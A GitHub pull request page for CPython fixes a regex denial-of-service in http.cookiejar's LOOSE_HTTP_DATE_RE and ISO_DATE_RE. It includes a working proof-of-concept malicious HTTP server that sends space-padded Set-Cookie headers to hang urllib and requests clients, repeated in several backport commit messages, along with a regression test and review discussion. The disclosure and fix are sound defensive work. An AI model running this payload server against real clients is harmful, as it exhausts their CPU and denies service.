Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

bpo-38804: Fix REDoS in http.cookiejar #17157

Merged
merged 6 commits into from Nov 22, 2019

Conversation

bcaller
Copy link
Contributor

@bcaller bcaller commented Nov 14, 2019

The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).
LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

\d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

from http.server import BaseHTTPRequestHandler, HTTPServer

def make_set_cookie_value(n_spaces):
    spaces = " " * n_spaces
    expiry = f"1-c-1{spaces}!"
    return f"b;Expires={expiry}"

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.log_request(204)
        self.send_response_only(204)  # Don't bother sending Server and Date
        n_spaces = (
            int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
            if len(self.path) > 1 else
            65506  # Max header line length 65536
        )
        value = make_set_cookie_value(n_spaces)
        for i in range(99):  # Not necessary, but we can have up to 100 header lines
            self.send_header("Set-Cookie", value)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

import http.cookiejar, urllib.request
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

import requests
requests.get("http://localhost:44020/")

https://bugs.python.org/issue38804

The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).
LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")
@the-knights-who-say-ni
Copy link

Hello, and thanks for your contribution!

I'm a bot set up to make sure that the project can legally accept this contribution by verifying everyone involved has signed the PSF contributor agreement (CLA).

CLA Missing

Our records indicate the following people have not signed the CLA:

@bcaller

For legal reasons we need all the people listed to sign the CLA before we can look at your contribution. Please follow the steps outlined in the CPython devguide to rectify this issue.

If you have recently signed the CLA, please wait at least one business day
before our records are updated.

You can check yourself to see if the CLA has been received.

Thanks again for the contribution, we look forward to reviewing it!

@brandtbucher
Copy link
Member

Thanks for your time @bcaller, and welcome to CPython!

I assume that you've seen the bot's message about the CLA?

@brandtbucher brandtbucher added the type-security A security issue label Nov 15, 2019
@bcaller
Copy link
Contributor Author

bcaller commented Nov 15, 2019

Yes @brandtbucher, I just signed it.

Copy link
Member

@brandtbucher brandtbucher left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This PR should also have a NEWS entry. Something like:

Fixes a ReDoS vulnerability in :class:`http.cookiejar.CookieJar`.

Copy link
Member

@brandtbucher brandtbucher left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks @bcaller, this looks good to me now. I’m not an expert on this code though, so we’ll need to find somebody who is.

Copy link
Member

@serhiy-storchaka serhiy-storchaka left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM. There is the same problem with ISO_DATE_RE. Do you mind to fix it too?

Would be nice to add tests (if it is possible) -- some examples, which takes more than a hour with unpatched code and just a fraction of second with patched code.

@bcaller
Copy link
Contributor Author

bcaller commented Nov 15, 2019

ISO_DATE_RE only has 2 overlapping \s*s (compared to 3) so it isn't catastrophic.
Also it is only used when loading LWPCookieJar files, so just processing an HTTP response won't cause DoS.
That said, it is a little inefficient in the case where a LWPCookieJar file has been tampered with so could be fixed in the same way.

I was thinking about the test, but how do I make a test which is reliable, regardless of CPU power and other processes running on the machine? I could make a test which measures the time for successively longer strings and asserts the performance is sub-quadratic?

@serhiy-storchaka
Copy link
Member

I think it is enough to use an example that takes long time (a hour or few hours). It will not pass unnoticed.

@bcaller
Copy link
Contributor Author

bcaller commented Nov 15, 2019

I wrote an overcomplicated test

    def test_http2time_redos_regression(self):
        def run_timer(n_spaces):
            return timeit.timeit(
                stmt="http2time(expires)",
                number=5,
                globals=dict(
                    http2time=http2time,
                    expires="1-c-1{}!".format(' ' * n_spaces),
                ),
            )
        base_n_spaces = 500
        factor = 2  # Length of backtracking sequence is increased by this factor
        long_time = run_timer(base_n_spaces * factor)
        short_time = run_timer(base_n_spaces)
        self.assertLess(
            long_time / short_time,  # Execution time increased by this factor
            factor ** 1.2,  # Expected to be approximately equal, but we can have some leeway
            "Performance of http2time is significantly worse than linear",
        )

but I think I'll just do what you said instead.

def test_http2time_redos_regression_actually_completes(self):
# LOOSE_HTTP_DATE_RE was vulnerable to malicious input which caused catastrophic backtracking (REDoS).
# If we regress, this test will take a very long time to succeed.
http2time("1-c-1{}!".format(" " * 65506))
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Would it be possible to use time.perf_counter() to detect if the function takes way too long? For example, test with 1 space, than test with 65K spaces, and test that the second test is not like 1000x slower?

In general, I dislike tests which rely on time, since they are likely to fail on our slowest buildbot. But I don't suggest to use hardcoded timing, only to compare timings of two function calls. It may work on buildbot, especially if the threshold is large enough (1000x slower? more?).

cc @pablogsal

Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

With the fixed regex the test should take a fraction of second.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@vstinner Do you mean something like the above #17157 (comment) ?
The issue here is whether we really should have a unit test for algorithmic complexity of a function at all and what it should look like. Do we do that anywhere else?
I agree that having the one-line test which never explicitly fails is a bit weird.

Copy link
Member

@serhiy-storchaka serhiy-storchaka left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

http2time() has cubic complexity, iso2time() has quadratic complexity.

def test_http2time_redos_regression_actually_completes(self):
# LOOSE_HTTP_DATE_RE was vulnerable to malicious input which caused catastrophic backtracking (REDoS).
# If we regress, this test will take a very long time to succeed.
http2time("1-c-1{}!".format(" " * 65506))
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

With the fixed regex the test should take a fraction of second.

Lib/test/test_http_cookiejar.py Outdated Show resolved Hide resolved
If we regress, this test will take a very long time.
A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
Copy link
Member

@serhiy-storchaka serhiy-storchaka left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Great! I see this is your first contribution. Do you mind to add also your name in Misc/ACKS?

@miss-islington
Copy link
Contributor

Thanks @bcaller for the PR, and @vstinner for merging it 🌮🎉.. I'm working now to backport this PR to: 3.8.
🐍🍒⛏🤖

miss-islington pushed a commit to miss-islington/cpython that referenced this pull request Nov 22, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  GH- Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  GH- Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  GH- Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  GH- Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bf)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
@bedevere-bot bedevere-bot removed the needs backport to 3.8 only security fixes label Nov 22, 2019
@bedevere-bot
Copy link

GH-17341 is a backport of this pull request to the 3.8 branch.

@miss-islington
Copy link
Contributor

Thanks @bcaller for the PR, and @vstinner for merging it 🌮🎉.. I'm working now to backport this PR to: 3.7.
🐍🍒⛏🤖

@bedevere-bot
Copy link

GH-17342 is a backport of this pull request to the 3.7 branch.

miss-islington pushed a commit to miss-islington/cpython that referenced this pull request Nov 22, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  GH- Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  GH- Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  GH- Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  GH- Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bf)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
@miss-islington
Copy link
Contributor

Thanks @bcaller for the PR, and @vstinner for merging it 🌮🎉.. I'm working now to backport this PR to: 3.6.
🐍🍒⛏🤖 I'm not a witch! I'm not a witch!

@bedevere-bot
Copy link

GH-17343 is a backport of this pull request to the 3.6 branch.

miss-islington pushed a commit to miss-islington/cpython that referenced this pull request Nov 22, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  GH- Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  GH- Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  GH- Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  GH- Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bf)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
@vstinner
Copy link
Member

What happens now?

I merged your PR, thanks. I'm ok to skip the automated test to measure the maximum time.

I backported the fix to all supported Python branches: 2.7, 3.5, 3.6, 3.7 and 3.8.

@brandtbucher
Copy link
Member

Congrats on your first CPython contribution @bcaller! 🍾

Looking forward to seeing more from you in the future.

miss-islington added a commit that referenced this pull request Nov 22, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  GH- Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  GH- Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  GH- Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  GH- Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bf)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
miss-islington added a commit that referenced this pull request Nov 22, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  GH- Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  GH- Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  GH- Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  GH- Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bf)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
ned-deily pushed a commit that referenced this pull request Nov 22, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  GH- Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  GH- Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  GH- Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  GH- Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bf)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
vstinner added a commit that referenced this pull request Nov 24, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.

(cherry picked from commit 1b779bf)
@bedevere-bot
Copy link

⚠️⚠️⚠️ Buildbot failure ⚠️⚠️⚠️

Hi! The buildbot AMD64 FreeBSD Shared 2.7 has failed when building commit e649903.

What do you need to do:

  1. Don't panic.
  2. Check the buildbot page in the devguide if you don't know what the buildbots are or how they work.
  3. Go to the page of the buildbot that failed (https://buildbot.python.org/all/#builders/366/builds/8) and take a look at the build logs.
  4. Check if the failure is related to this commit (e649903) or if it is a false positive.
  5. If the failure is related to this commit, please, reflect that on the issue and make a new Pull Request with a fix.

You can take a look at the buildbot page here:

https://buildbot.python.org/all/#builders/366/builds/8

Failed tests:

  • test_ssl

Failed subtests:

  • test_load_cert_chain - test.test_ssl.ContextTests

Summary of the results of the build (if available):

== Tests result: FAILURE then FAILURE ==

368 tests OK.

10 slowest tests:

  • test_lib2to3: 198.9s
  • test_io: 195.0s
  • test_tokenize: 144.3s
  • test_regrtest: 139.3s
  • test_decimal: 129.4s
  • test_itertools: 110.4s
  • test_multiprocessing: 77.4s
  • test_subprocess: 76.2s
  • test_file2k: 45.5s
  • test_weakref: 43.2s

1 test failed:
test_ssl

35 tests skipped:
test_aepack test_al test_applesingle test_bsddb test_bsddb3
test_cd test_cl test_dl test_epoll test_gdb test_gdbm test_gl
test_idle test_imageop test_imgfile test_ioctl test_linuxaudiodev
test_macos test_macostools test_msilib test_ossaudiodev
test_pep277 test_scriptpackages test_spwd test_startfile
test_sunaudiodev test_tcl test_tk test_ttk_guionly
test_ttk_textonly test_turtle test_unicode_file test_winreg
test_winsound test_zipfile64
Ask someone to teach regrtest.py about which tests are
xpected to get skipped on freebsd13.

1 re-run test:
test_ssl

Total duration: 11 min 47 sec

Click to see traceback logs
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/usr/local/lib/python2.7/test/test_support.py", line 2, in <module>
    import test.support
  File "/usr/local/lib/python2.7/test/support/__init__.py", line 6, in <module>
    import contextlib
  File "/usr/local/lib/python2.7/contextlib.py", line 4, in <module>
    from functools import wraps
  File "/usr/local/lib/python2.7/functools.py", line 10, in <module>
    from _functools import partial, reduce
ImportError: /usr/local/lib/python2.7/lib-dynload/_functools.so: Undefined symbol "Py_InitModule4_64"


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 189, in f
    return func(*args, **kwargs)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2402, in test_protocol_sslv23
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2134, in try_protocol_combo
    chatty=False, connectionchatty=False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2062, in server_params_test
    s.connect((HOST, server.port))
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 864, in connect
    self._real_connect(addr, False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 855, in _real_connect
    self.do_handshake()
